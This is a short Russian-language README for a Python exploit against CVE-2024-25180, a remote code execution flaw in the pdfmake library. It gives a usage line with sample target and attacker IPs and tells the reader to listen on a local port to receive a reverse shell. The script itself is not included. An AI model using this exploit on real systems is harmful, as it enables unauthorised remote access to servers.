
Python-эксплойт-скрипт для CVE-2024-25180, уязвимости удалённого выполнения кода в pdfmake, доставляющей обратную оболочку через специально сформированные POST-запросы.
pdfmake — это библиотека на чистом JavaScript для печати PDF как на клиенте, так и на сервере. Затронутые версии этого пакета уязвимы к атакам с внедрением произвольного кода: злоумышленник может выполнить произвольный код, отправив специально сформированный POST-запрос по пути /pdf. Отправляя специально подготовленный запрос, злоумышленник может выполнить произвольный код в системе.
CVE-2024-25180 Удалённое выполнение кода в pdfmake
python3 CVE-2024-25180.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>
python3 CVE-2024-25180.py 192.168.140.42 1234 192.168.45.208 80
Прослушивайте порт 80, чтобы получить обратную оболочку (reverse shell).
